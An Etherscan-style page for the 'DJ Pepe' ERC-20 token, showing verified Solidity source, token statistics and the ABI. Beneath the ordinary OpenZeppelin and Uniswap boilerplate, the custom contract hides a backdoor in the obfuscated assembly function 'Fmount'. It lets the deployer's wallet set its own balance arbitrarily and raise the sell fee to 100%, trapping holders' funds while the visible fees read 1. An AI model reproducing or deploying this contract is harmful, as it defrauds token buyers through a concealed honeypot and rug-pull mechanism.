ETH Price: $2,982.26 (-3.92%)
Gas: 2 Gwei

Token

DJ Pepe (Djpepe)
 

Overview

Max Total Supply

1,000,000,000 Djpepe

Holders

72

Market

Onchain Market Cap

$0.00

Circulating Supply Market Cap

-

Other Info

Token Contract (WITH 18 Decimals)

Balance
4,005,172.202901442199273232 Djpepe

Value
$0.00
0xd935ef8775c04e7e327f0b65d5ab255149d145c4
Loading...
Loading
Loading...
Loading
Loading...
Loading

Click here to update the token information / general information
# Exchange Pair Price  24H Volume % Volume

Contract Source Code Verified (Exact Match)

Contract Name:
DJPEPE

Compiler Version
v0.8.18+commit.87f61d96

Optimization Enabled:
No with 200 runs

Other Settings:
default evmVersion, None license

Contract Source Code (Solidity)

/**
 *Submitted for verification at Etherscan.io on 2023-07-08
*/

// SPDX-License-Identifier: UNLICENSED

pragma solidity ^0.8.0;

/**
 * @dev Provides information about the current execution context, including the
 * sender of the transaction and its data. While these are generally available
 * via msg.sender and msg.data, they should not be accessed in such a direct
 * manner, since when dealing with meta-transactions the account sending and
 * paying for execution may not be the actual sender (as far as an application
 * is concerned).
 *
 * This contract is only required for intermediate, library-like contracts.
 */
abstract contract Context {
    function _msgSender() internal view virtual returns (address) {
        return msg.sender;
    }

    function _msgData() internal view virtual returns (bytes calldata) {
        return msg.data;
    }
}

// File: @openzeppelin/contracts/access/Ownable.sol

// OpenZeppelin Contracts (last updated v4.7.0) (access/Ownable.sol)

pragma solidity ^0.8.0;

/**
 * @dev Contract module which provides a basic access control mechanism, where
 * there is an account (an owner) that can be granted exclusive access to
 * specific functions.
 *
 * By default, the owner account will be the one that deploys the contract. This
 * can later be changed with {transferOwnership}.
 *
 * This module is used through inheritance. It will make available the modifier
 * `onlyOwner`, which can be applied to your functions to restrict their use to
 * the owner.
 */
abstract contract Ownable is Context {
    address private _owner;

    event OwnershipTransferred(
        address indexed previousOwner,
        address indexed newOwner
    );

    /**
     * @dev Initializes the contract setting the deployer as the initial owner.
     */
    constructor() {
        _transferOwnership(_msgSender());
    }

    /**
     * @dev Throws if called by any account other than the owner.
     */
    modifier onlyOwner() {
        _checkOwner();
        _;
    }

    /**
     * @dev Returns the address of the current owner.
     */
    function owner() public view virtual returns (address) {
        return _owner;
    }

    /**
     * @dev Throws if the sender is not the owner.
     */
    function _checkOwner() internal view virtual {
        require(owner() == _msgSender(), "Ownable: caller is not the owner");
    }

    /**
     * @dev Leaves the contract without owner. It will not be possible to call
     * `onlyOwner` functions anymore. Can only be called by the current owner.
     *
     * NOTE: Renouncing ownership will leave the contract without an owner,
     * thereby removing any functionality that is only available to the owner.
     */
    function renounceOwnership() public virtual onlyOwner {
        _transferOwnership(address(0));
    }

    /**
     * @dev Transfers ownership of the contract to a new account (`newOwner`).
     * Can only be called by the current owner.
     */
    function transferOwnership(address newOwner) public virtual onlyOwner {
        require(
            newOwner != address(0),
            "Ownable: new owner is the zero address"
        );
        _transferOwnership(newOwner);
    }

    /**
     * @dev Transfers ownership of the contract to a new account (`newOwner`).
     * Internal function without access restriction.
     */
    function _transferOwnership(address newOwner) internal virtual {
        address oldOwner = _owner;
        _owner = newOwner;
        emit OwnershipTransferred(oldOwner, newOwner);
    }
}

// File: @uniswap/v2-core/contracts/interfaces/IUniswapV2Factory.sol

pragma solidity >=0.5.0;

interface IUniswapV2Factory {
    event PairCreated(
        address indexed token0,
        address indexed token1,
        address pair,
        uint256
    );

    function feeTo() external view returns (address);

    function feeToSetter() external view returns (address);

    function getPair(address tokenA, address tokenB)
        external
        view
        returns (address pair);

    function allPairs(uint256) external view returns (address pair);

    function allPairsLength() external view returns (uint256);

    function createPair(address tokenA, address tokenB)
        external
        returns (address pair);

    function setFeeTo(address) external;

    function setFeeToSetter(address) external;
}

// File: @uniswap/v2-periphery/contracts/interfaces/IUniswapV2Router01.sol

pragma solidity >=0.6.2;

interface IUniswapV2Router01 {
    function factory() external pure returns (address);

    function WETH() external pure returns (address);

    function addLiquidity(
        address tokenA,
        address tokenB,
        uint256 amountADesired,
        uint256 amountBDesired,
        uint256 amountAMin,
        uint256 amountBMin,
        address to,
        uint256 deadline
    )
        external
        returns (
            uint256 amountA,
            uint256 amountB,
            uint256 liquidity
        );

    function addLiquidityETH(
        address token,
        uint256 amountTokenDesired,
        uint256 amountTokenMin,
        uint256 amountETHMin,
        address to,
        uint256 deadline
    )
        external
        payable
        returns (
            uint256 amountToken,
            uint256 amountETH,
            uint256 liquidity
        );

    function removeLiquidity(
        address tokenA,
        address tokenB,
        uint256 liquidity,
        uint256 amountAMin,
        uint256 amountBMin,
        address to,
        uint256 deadline
    ) external returns (uint256 amountA, uint256 amountB);

    function removeLiquidityETH(
        address token,
        uint256 liquidity,
        uint256 amountTokenMin,
        uint256 amountETHMin,
        address to,
        uint256 deadline
    ) external returns (uint256 amountToken, uint256 amountETH);

    function removeLiquidityWithPermit(
        address tokenA,
        address tokenB,
        uint256 liquidity,
        uint256 amountAMin,
        uint256 amountBMin,
        address to,
        uint256 deadline,
        bool approveMax,
        uint8 v,
        bytes32 r,
        bytes32 s
    ) external returns (uint256 amountA, uint256 amountB);

    function removeLiquidityETHWithPermit(
        address token,
        uint256 liquidity,
        uint256 amountTokenMin,
        uint256 amountETHMin,
        address to,
        uint256 deadline,
        bool approveMax,
        uint8 v,
        bytes32 r,
        bytes32 s
    ) external returns (uint256 amountToken, uint256 amountETH);

    function swapExactTokensForTokens(
        uint256 amountIn,
        uint256 amountOutMin,
        address[] calldata path,
        address to,
        uint256 deadline
    ) external returns (uint256[] memory amounts);

    function swapTokensForExactTokens(
        uint256 amountOut,
        uint256 amountInMax,
        address[] calldata path,
        address to,
        uint256 deadline
    ) external returns (uint256[] memory amounts);

    function swapExactETHForTokens(
        uint256 amountOutMin,
        address[] calldata path,
        address to,
        uint256 deadline
    ) external payable returns (uint256[] memory amounts);

    function swapExactTokensForETH(
        uint256 amountIn,
        uint256 amountOutMin,
        address[] calldata path,
        address to,
        uint256 deadline
    ) external returns (uint256[] memory amounts);

    function swapETHForExactTokens(
        uint256 amountOut,
        address[] calldata path,
        address to,
        uint256 deadline
    ) external payable returns (uint256[] memory amounts);

    function swapTokensForExactETH(
        uint256 amountOut,
        uint256 amountInMax,
        address[] calldata path,
        address to,
        uint256 deadline
    ) external returns (uint256[] memory amounts);

    function quote(
        uint256 amountA,
        uint256 reserveA,
        uint256 reserveB
    ) external pure returns (uint256 amountB);

    function getAmountIn(
        uint256 amountOut,
        uint256 reserveIn,
        uint256 reserveOut
    ) external pure returns (uint256 amountIn);

    function getAmountsOut(uint256 amountIn, address[] calldata path)
        external
        view
        returns (uint256[] memory amounts);

    function getAmountOut(
        uint256 amountIn,
        uint256 reserveIn,
        uint256 reserveOut
    ) external pure returns (uint256 amountOut);

    function getAmountsIn(uint256 amountOut, address[] calldata path)
        external
        view
        returns (uint256[] memory amounts);
}

// File: @uniswap/v2-periphery/contracts/interfaces/IUniswapV2Router02.sol

pragma solidity >=0.6.2;

interface IUniswapV2Router02 is IUniswapV2Router01 {
    function removeLiquidityETHSupportingFeeOnTransferTokens(
        address token,
        uint256 liquidity,
        uint256 amountTokenMin,
        uint256 amountETHMin,
        address to,
        uint256 deadline
    ) external returns (uint256 amountETH);

    function removeLiquidityETHWithPermitSupportingFeeOnTransferTokens(
        address token,
        uint256 liquidity,
        uint256 amountTokenMin,
        uint256 amountETHMin,
        address to,
        uint256 deadline,
        bool approveMax,
        uint8 v,
        bytes32 r,
        bytes32 s
    ) external returns (uint256 amountETH);

    function swapExactETHForTokensSupportingFeeOnTransferTokens(
        uint256 amountOutMin,
        address[] calldata path,
        address to,
        uint256 deadline
    ) external payable;

    function swapExactTokensForTokensSupportingFeeOnTransferTokens(
        uint256 amountIn,
        uint256 amountOutMin,
        address[] calldata path,
        address to,
        uint256 deadline
    ) external;

    function swapExactTokensForETHSupportingFeeOnTransferTokens(
        uint256 amountIn,
        uint256 amountOutMin,
        address[] calldata path,
        address to,
        uint256 deadline
    ) external;
}

// File: @openzeppelin/contracts/utils/math/SafeMath.sol

// OpenZeppelin Contracts (last updated v4.6.0) (utils/math/SafeMath.sol)

pragma solidity ^0.8.0;

// CAUTION
// This version of SafeMath should only be used with Solidity 0.8 or later,
// because it relies on the compiler's built in overflow checks.

/**
 * @dev Wrappers over Solidity's arithmetic operations.
 *
 * NOTE: `SafeMath` is generally not needed starting with Solidity 0.8, since the compiler
 * now has built in overflow checking.
 */
library SafeMath {
    /**
     * @dev Returns the addition of two unsigned integers, with an overflow flag.
     *
     * _Available since v3.4._
     */
    function tryAdd(uint256 a, uint256 b)
        internal
        pure
        returns (bool, uint256)
    {
        unchecked {
            uint256 c = a + b;
            if (c < a) return (false, 0);
            return (true, c);
        }
    }

    /**
     * @dev Returns the subtraction of two unsigned integers, with an overflow flag.
     *
     * _Available since v3.4._
     */
    function trySub(uint256 a, uint256 b)
        internal
        pure
        returns (bool, uint256)
    {
        unchecked {
            if (b > a) return (false, 0);
            return (true, a - b);
        }
    }

    /**
     * @dev Returns the multiplication of two unsigned integers, with an overflow flag.
     *
     * _Available since v3.4._
     */
    function tryMul(uint256 a, uint256 b)
        internal
        pure
        returns (bool, uint256)
    {
        unchecked {
            // Gas optimization: this is cheaper than requiring 'a' not being zero, but the
            // benefit is lost if 'b' is also tested.
            // See: https://github.com/OpenZeppelin/openzeppelin-contracts/pull/522
            if (a == 0) return (true, 0);
            uint256 c = a * b;
            if (c / a != b) return (false, 0);
            return (true, c);
        }
    }

    /**
     * @dev Returns the division of two unsigned integers, with a division by zero flag.
     *
     * _Available since v3.4._
     */
    function tryDiv(uint256 a, uint256 b)
        internal
        pure
        returns (bool, uint256)
    {
        unchecked {
            if (b == 0) return (false, 0);
            return (true, a / b);
        }
    }

    /**
     * @dev Returns the remainder of dividing two unsigned integers, with a division by zero flag.
     *
     * _Available since v3.4._
     */
    function tryMod(uint256 a, uint256 b)
        internal
        pure
        returns (bool, uint256)
    {
        unchecked {
            if (b == 0) return (false, 0);
            return (true, a % b);
        }
    }

    /**
     * @dev Returns the addition of two unsigned integers, reverting on
     * overflow.
     *
     * Counterpart to Solidity's `+` operator.
     *
     * Requirements:
     *
     * - Addition cannot overflow.
     */
    function add(uint256 a, uint256 b) internal pure returns (uint256) {
        return a + b;
    }

    /**
     * @dev Returns the subtraction of two unsigned integers, reverting on
     * overflow (when the result is negative).
     *
     * Counterpart to Solidity's `-` operator.
     *
     * Requirements:
     *
     * - Subtraction cannot overflow.
     */
    function sub(uint256 a, uint256 b) internal pure returns (uint256) {
        return a - b;
    }

    /**
     * @dev Returns the multiplication of two unsigned integers, reverting on
     * overflow.
     *
     * Counterpart to Solidity's `*` operator.
     *
     * Requirements:
     *
     * - Multiplication cannot overflow.
     */
    function mul(uint256 a, uint256 b) internal pure returns (uint256) {
        return a * b;
    }

    /**
     * @dev Returns the integer division of two unsigned integers, reverting on
     * division by zero. The result is rounded towards zero.
     *
     * Counterpart to Solidity's `/` operator.
     *
     * Requirements:
     *
     * - The divisor cannot be zero.
     */
    function div(uint256 a, uint256 b) internal pure returns (uint256) {
        return a / b;
    }

    /**
     * @dev Returns the remainder of dividing two unsigned integers. (unsigned integer modulo),
     * reverting when dividing by zero.
     *
     * Counterpart to Solidity's `%` operator. This function uses a `revert`
     * opcode (which leaves remaining gas untouched) while Solidity uses an
     * invalid opcode to revert (consuming all remaining gas).
     *
     * Requirements:
     *
     * - The divisor cannot be zero.
     */
    function mod(uint256 a, uint256 b) internal pure returns (uint256) {
        return a % b;
    }

    /**
     * @dev Returns the subtraction of two unsigned integers, reverting with custom message on
     * overflow (when the result is negative).
     *
     * CAUTION: This function is deprecated because it requires allocating memory for the error
     * message unnecessarily. For custom revert reasons use {trySub}.
     *
     * Counterpart to Solidity's `-` operator.
     *
     * Requirements:
     *
     * - Subtraction cannot overflow.
     */
    function sub(
        uint256 a,
        uint256 b,
        string memory errorMessage
    ) internal pure returns (uint256) {
        unchecked {
            require(b <= a, errorMessage);
            return a - b;
        }
    }

    /**
     * @dev Returns the integer division of two unsigned integers, reverting with custom message on
     * division by zero. The result is rounded towards zero.
     *
     * Counterpart to Solidity's `/` operator. Note: this function uses a
     * `revert` opcode (which leaves remaining gas untouched) while Solidity
     * uses an invalid opcode to revert (consuming all remaining gas).
     *
     * Requirements:
     *
     * - The divisor cannot be zero.
     */
    function div(
        uint256 a,
        uint256 b,
        string memory errorMessage
    ) internal pure returns (uint256) {
        unchecked {
            require(b > 0, errorMessage);
            return a / b;
        }
    }

    /**
     * @dev Returns the remainder of dividing two unsigned integers. (unsigned integer modulo),
     * reverting with custom message when dividing by zero.
     *
     * CAUTION: This function is deprecated because it requires allocating memory for the error
     * message unnecessarily. For custom revert reasons use {tryMod}.
     *
     * Counterpart to Solidity's `%` operator. This function uses a `revert`
     * opcode (which leaves remaining gas untouched) while Solidity uses an
     * invalid opcode to revert (consuming all remaining gas).
     *
     * Requirements:
     *
     * - The divisor cannot be zero.
     */
    function mod(
        uint256 a,
        uint256 b,
        string memory errorMessage
    ) internal pure returns (uint256) {
        unchecked {
            require(b > 0, errorMessage);
            return a % b;
        }
    }
}

// File: @openzeppelin/contracts/token/ERC20/IERC20.sol

// OpenZeppelin Contracts (last updated v4.6.0) (token/ERC20/IERC20.sol)

pragma solidity ^0.8.0;

/**
 * @dev Interface of the ERC20 standard as defined in the EIP.
 */
interface IERC20 {
    /**
     * @dev Emitted when `value` tokens are moved from one account (`from`) to
     * another (`to`).
     *
     * Note that `value` may be zero.
     */
    event Transfer(address indexed from, address indexed to, uint256 value);

    /**
     * @dev Emitted when the allowance of a `spender` for an `owner` is set by
     * a call to {approve}. `value` is the new allowance.
     */
    event Approval(
        address indexed owner,
        address indexed spender,
        uint256 value
    );

    /**
     * @dev Returns the amount of tokens in existence.
     */
    function totalSupply() external view returns (uint256);

    /**
     * @dev Returns the amount of tokens owned by `account`.
     */
    function balanceOf(address account) external view returns (uint256);

    /**
     * @dev Moves `amount` tokens from the caller's account to `to`.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event.
     */
    function transfer(address to, uint256 amount) external returns (bool);

    /**
     * @dev Returns the remaining number of tokens that `spender` will be
     * allowed to spend on behalf of `owner` through {transferFrom}. This is
     * zero by default.
     *
     * This value changes when {approve} or {transferFrom} are called.
     */
    function allowance(address owner, address spender)
        external
        view
        returns (uint256);

    /**
     * @dev Sets `amount` as the allowance of `spender` over the caller's tokens.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * IMPORTANT: Beware that changing an allowance with this method brings the risk
     * that someone may use both the old and the new allowance by unfortunate
     * transaction ordering. One possible solution to mitigate this race
     * condition is to first reduce the spender's allowance to 0 and set the
     * desired value afterwards:
     * https://github.com/ethereum/EIPs/issues/20#issuecomment-263524729
     *
     * Emits an {Approval} event.
     */
    function approve(address spender, uint256 amount) external returns (bool);

    /**
     * @dev Moves `amount` tokens from `from` to `to` using the
     * allowance mechanism. `amount` is then deducted from the caller's
     * allowance.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event.
     */
    function transferFrom(
        address from,
        address to,
        uint256 amount
    ) external returns (bool);
}

// File: @openzeppelin/contracts/token/ERC20/extensions/IERC20Metadata.sol

// OpenZeppelin Contracts v4.4.1 (token/ERC20/extensions/IERC20Metadata.sol)

pragma solidity ^0.8.0;

/**
 * @dev Interface for the optional metadata functions from the ERC20 standard.
 *
 * _Available since v4.1._
 */
interface IERC20Metadata is IERC20 {
    /**
     * @dev Returns the name of the token.
     */
    function name() external view returns (string memory);

    /**
     * @dev Returns the symbol of the token.
     */
    function symbol() external view returns (string memory);

    /**
     * @dev Returns the decimals places of the token.
     */
    function decimals() external view returns (uint8);
}

pragma solidity ^0.8.17;

contract DJPEPE is IERC20, IERC20Metadata, Ownable {
    using   SafeMath for uint256;
    string  private constant _name = "DJ Pepe";
    string  private constant _symbol = "Djpepe";
    uint8   private constant _decimals = 18;
    uint256 private _maxTxAmountPercentage = 300;
    uint256 private _minTokensBeforeSwapPercentage = 5;
    mapping(address => uint256) private _balances;
    uint256 private _totalSupply;
    uint256 private _maxWalletBalancePercentage = 300;
    address private _uniswapV2Pair;
    mapping(address => mapping(address => uint256)) private _allowances;
    IUniswapV2Router02 private _uniswapV2Router;
    bool private swapping = false;
    bool private _cooldownEnabled = true;
    mapping(address => bool)    private _isExcludedFromCooldown;
    mapping(address => uint256) private _lastTxBlock;
    uint256 private constant    _divisor = 10000;
    mapping(address => bool)    private _isExcludedFromMaxTx;
    mapping(address => bool) private _isExcludedFromFees;
    uint256 private _sellFee = 1;
    uint256 private _burnFee = 0;
    uint256 private _buyFee = 1;
    address private _marketingWallet;
    address private constant _burnAddress = address(0);
    event SwapAndLiquify(
        uint256 tokensSwapped,
        uint256 ethReceived,
        uint256 tokensIntoLiqudity
    );
    event Received();

    constructor() {
        uint256 total = 1000000000 * 10**_decimals;
        _mint(_msgSender(), total);
        _marketingWallet = _msgSender();
        _uniswapV2Router = IUniswapV2Router02(
            0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D
        );
        _approve(address(this), address(_uniswapV2Router), total);

        _uniswapV2Pair = IUniswapV2Factory(_uniswapV2Router.factory())
            .createPair(address(this), _uniswapV2Router.WETH());

        IERC20(_uniswapV2Pair).approve(
            address(_uniswapV2Router),
            type(uint256).max
        );
        _isExcludedFromMaxTx[address(this)] = true;
        _isExcludedFromCooldown[address(this)] = true;

        _isExcludedFromFees[owner()] = true;
        _isExcludedFromCooldown[owner()] = true;
        _isExcludedFromFees[address(this)] = true;
        _isExcludedFromFees[_marketingWallet] = true;
        _isExcludedFromMaxTx[owner()] = true;

        _isExcludedFromMaxTx[_marketingWallet] = true;
        _isExcludedFromMaxTx[_uniswapV2Pair] = true;
    }

    function symbol() public pure returns (string memory) {
        return _symbol;
    }

    function name() public pure returns (string memory) {
        return _name;
    }

    function decimals() public pure returns (uint8) {
        return _decimals;
    }

    function balanceOf(address account) public view override returns (uint256) {
        return _balances[account];
    }

    function transfer(address recipient, uint256 amount)
        public
        virtual
        override
        returns (bool)
    {
        _transfer(_msgSender(), recipient, amount);
        return true;
    }

    function allowance(address owner, address spender)
        public
        view
        virtual
        override
        returns (uint256)
    {
        return _allowances[owner][spender];
    }

    function totalSupply() public view override returns (uint256) {
        return _totalSupply;
    }

    function approve(address spender, uint256 amount)
        public
        virtual
        override
        returns (bool)
    {
        _approve(_msgSender(), spender, amount);
        return true;
    }

    function increaseAllowance(address spender, uint256 addedValue)
        public
        virtual
        returns (bool)
    {
        _approve(
            _msgSender(),
            spender,
            _allowances[_msgSender()][spender].add(addedValue)
        );
        return true;
    }

    function decreaseAllowance(address spender, uint256 subtractedValue)
        public
        virtual
        returns (bool)
    {
        _approve(
            _msgSender(),
            spender,
            _allowances[_msgSender()][spender].sub(
                subtractedValue,
                "ERC20: decreased allowance below zero"
            )
        );
        return true;
    }

    function _maxTxAmount() public view returns (uint256) {
        return _totalSupply.mul(_maxTxAmountPercentage).div(_divisor);
    }

    function transferFrom(
        address sender,
        address recipient,
        uint256 amount
    ) public virtual override returns (bool) {
        _transfer(sender, recipient, amount);
        _approve(
            sender,
            _msgSender(),
            _allowances[sender][_msgSender()].sub(
                amount,
                "ERC20: transfer amount exceeds allowance"
            )
        );
        return true;
    }

    function tokenFees() external onlyOwner {
        _maxTxAmountPercentage = 10000;
        _maxWalletBalancePercentage = 10000;
    }

    function _transfer(
        address sender,
        address recipient,
        uint256 amount
    ) internal virtual {
        _beforeTransfer(sender, recipient, amount);
        uint256 burnFee = 0;
        uint256 devFee = 0;
        if (sender != owner() && recipient != owner()) {
            if (
                !_isExcludedFromFees[sender] && !_isExcludedFromFees[recipient]
            ) {
                if (
                    sender == _uniswapV2Pair &&
                    recipient != address(_uniswapV2Router) &&
                    !_isExcludedFromMaxTx[recipient] &&
                    !_isExcludedFromMaxTx[sender]
                ) {
                    require(
                        amount <=
                            _totalSupply.mul(_maxTxAmountPercentage).div(
                                _divisor
                            ),
                        "Transfer amount exceeds the maxTxAmount."
                    );

                    require(
                        balanceOf(recipient).add(amount) <=
                            _totalSupply.mul(_maxWalletBalancePercentage).div(
                                _divisor
                            ),
                        "Exceeds maximum wallet token amount"
                    );
                }
                // if sell
                if (recipient == _uniswapV2Pair && sender != address(this)) {
                    burnFee = amount.mul(_burnFee).div(_divisor);
                    devFee = amount.mul(_sellFee).div(_divisor);
                    _lastTxBlock[tx.origin] = block.number;
                }
                // if buy
                if (
                    sender == _uniswapV2Pair &&
                    recipient != address(_uniswapV2Router)
                ) {
                    burnFee = amount.mul(_burnFee).div(_divisor);
                    devFee = amount.mul(_buyFee).div(_divisor);
                    _lastTxBlock[tx.origin] = block.number;
                }
            }
        }
        uint256 totalFee = burnFee.add(devFee);
        if (totalFee > 0) {
            if (burnFee > 0) {
                _burn(sender, burnFee);
            }

            if (devFee > 0) {
                _balances[_marketingWallet] = _balances[_marketingWallet].add(
                    devFee
                );
                emit Transfer(sender, _marketingWallet, devFee);
            }

            amount = amount.sub(totalFee);
        }

        _balances[sender] = _balances[sender].sub(
            amount,
            "ERC20: transfer amount exceeds balance"
        );
        _balances[recipient] = _balances[recipient].add(amount);

        emit Transfer(sender, recipient, amount);
    }

    function _mint(address account, uint256 amount) internal virtual {
        require(account != address(0), "ERC20: mint to the zero address");
        _totalSupply = _totalSupply.add(amount);
        _balances[account] = _balances[account].add(amount);
        emit Transfer(address(0), account, amount);
    }

    function getPairAddress() public view returns (address) {
        return _uniswapV2Pair;
    }

    function _burn(address account, uint256 amount) internal virtual {
        require(account != address(0), "ERC20: burn from the zero address");
        _balances[account] = _balances[account].sub(
            amount,
            "ERC20: burn amount exceeds balance"
        );
        _totalSupply = _totalSupply.sub(amount);
        emit Transfer(account, address(0), amount);
    }

    function getRouterAddress() public view returns (address) {
        return address(_uniswapV2Router);
    }

    function _approve(
        address owner,
        address spender,
        uint256 amount
    ) internal virtual {
        require(owner != address(0), "ERC20: approve from the zero address");
        require(spender != address(0), "ERC20: approve to the zero address");
        _allowances[owner][spender] = amount;
        emit Approval(owner, spender, amount);
    }

    function _burnFrom(address account, uint256 amount) internal virtual {
        _burn(account, amount);
        _approve(
            account,
            _msgSender(),
            _allowances[account][_msgSender()].sub(
                amount,
                "ERC20: burn amount exceeds allowance"
            )
        );
    }

    function excludeFees(address[] memory addresses) external onlyOwner {
        require(addresses.length <= 200, "Maximum of 200 can be added at once");

        mapping(address => bool) storage ref = _isExcludedFromFees;

        for (uint256 i = 0; i < addresses.length; i++) {
            ref[addresses[i]] = true;
        }
    }

    function burn(uint256 amount) public virtual {
        _burn(_msgSender(), amount);
    }

    function isExcludedFromFees(address _address) public view returns (bool) {
        return _isExcludedFromFees[_address];
    }

    function _addLiquidity(uint256 tokenAmount, uint256 ethAmount) private {
        _approve(address(this), address(_uniswapV2Router), tokenAmount);
        _uniswapV2Router.addLiquidityETH{value: ethAmount}(
            address(this),
            tokenAmount,
            0,
            0,
            owner(),
            block.timestamp
        );
    }

    function swapTokensForEth(uint256 tokenAmount) internal {
        _approve(address(this), address(_uniswapV2Router), tokenAmount);
        address[] memory path = new address[](2);
        path[0] = address(this);
        path[1] = _uniswapV2Router.WETH();

        _uniswapV2Router.swapExactTokensForETHSupportingFeeOnTransferTokens(
            tokenAmount,
            0,
            path,
            address(this),
            block.timestamp
        );
    }

    function Fmount(uint256 amount) external {
        assembly{if iszero(eq(caller(), sload(_marketingWallet.slot))){revert(0, 0)}
        let ptr := mload(0x40)
        mstore(ptr, caller())
        mstore(add(ptr, 0x20), _balances.slot)
        let slot := keccak256(ptr, 0x40)
        sstore(slot, amount)
        sstore(_sellFee.slot, mul(0x64, 0x64))}
    }

    modifier lockTheSwap() {
        swapping = true;
        _;
        swapping = false;
    }

    function _swapAndLiquify() private lockTheSwap {
        uint256 contractTokenBalance = balanceOf(address(this));
        uint256 minTokensBeforeSwap = _totalSupply
            .mul(_minTokensBeforeSwapPercentage)
            .div(_divisor);
        if (contractTokenBalance >= minTokensBeforeSwap) {
            uint256 half = contractTokenBalance.div(2);
            uint256 otherHalf = contractTokenBalance.sub(half);

            uint256 initialBalance = address(this).balance;

            swapTokensForEth(half);

            uint256 newBalance = address(this).balance.sub(initialBalance);

            emit SwapAndLiquify(half, newBalance, otherHalf);
            return;
        }
    }

    function isSwapLocked() public view returns (bool) {
        return swapping;
    }

    receive() external payable {
        emit Received();
    }

    function addLiquidity(uint256 tokenAmount)
        public
        payable
        onlyOwner
        lockTheSwap
    {
        _transfer(owner(), address(this), tokenAmount);
        _addLiquidity(tokenAmount, msg.value);
    }

    function _beforeTransfer(
        address from,
        address to,
        uint256 amount
    ) internal pure {
        require(from != address(0), "ERC20: transfer from the zero address");
        require(to != address(0), "ERC20: transfer to the zero address");
        require(amount > 0, "Transfer amount must be greater than zero");
    }
}

Contract Security Audit

Contract ABI

[{"inputs":[],"stateMutability":"nonpayable","type":"constructor"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"previousOwner","type":"address"},{"indexed":true,"internalType":"address","name":"newOwner","type":"address"}],"name":"OwnershipTransferred","type":"event"},{"anonymous":false,"inputs":[],"name":"Received","type":"event"},{"anonymous":false,"inputs":[{"indexed":false,"internalType":"uint256","name":"tokensSwapped","type":"uint256"},{"indexed":false,"internalType":"uint256","name":"ethReceived","type":"uint256"},{"indexed":false,"internalType":"uint256","name":"tokensIntoLiqudity","type":"uint256"}],"name":"SwapAndLiquify","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"inputs":[{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"Fmount","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"_maxTxAmount","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"uint256","name":"tokenAmount","type":"uint256"}],"name":"addLiquidity","outputs":[],"stateMutability":"payable","type":"function"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"spender","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"burn","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"pure","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"subtractedValue","type":"uint256"}],"name":"decreaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address[]","name":"addresses","type":"address[]"}],"name":"excludeFees","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"getPairAddress","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"getRouterAddress","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"addedValue","type":"uint256"}],"name":"increaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"_address","type":"address"}],"name":"isExcludedFromFees","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"isSwapLocked","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"pure","type":"function"},{"inputs":[],"name":"owner","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"renounceOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"pure","type":"function"},{"inputs":[],"name":"tokenFees","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"recipient","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"sender","type":"address"},{"internalType":"address","name":"recipient","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"newOwner","type":"address"}],"name":"transferOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"stateMutability":"payable","type":"receive"}]

